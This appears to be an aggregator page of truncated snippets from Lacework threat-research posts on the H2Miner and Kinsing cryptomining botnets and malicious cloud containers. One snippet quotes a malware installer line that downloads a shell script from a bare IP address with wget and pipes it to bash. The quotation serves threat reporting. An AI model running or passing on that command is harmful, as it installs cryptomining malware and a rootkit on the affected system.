Lacework

FEBRUARY 27, 2023

The malware and infrastructure have been attributed to the “H2Miner” cryptomining botnet which was last reported in January propagating […] Beginning on Valentine’s Day, one malicious container started making its rounds and has steadily expanded to over 350 infections.

Malware 52

Malware Infrastructure Research Report 52

Lacework

MARCH 25, 2020

The malware and infrastructure have been attributed to the “H2Miner” cryptomining botnet which was last reported in January propagating via a Redis RCE: New Outbreak [.]. The post H2Miner Botnet – Act 2 appeared first on Lacework.

Malware 74

Malware Infrastructure Report Cloud 74

Lacework

JUNE 7, 2022

As of this writing we have observed active exploitation by known Cloud threat malware families such as Kinsing, “Hezb”, and the Dark.IoT botnet. However, it’s a typical installer which downloads and runs the Kinsing H2miner malware as well as a userland level rootkit via libsystem.so. cf.sh||wget -q -O- 195.2.79.26/cf.sh)|bash.

Malware 144

Malware Infrastructure IoT Azure 144

Lacework

MARCH 24, 2020

Containers are gaining popularity as malware deployment mechanisms in the cloud.

Malware 40

Malware Cloud 40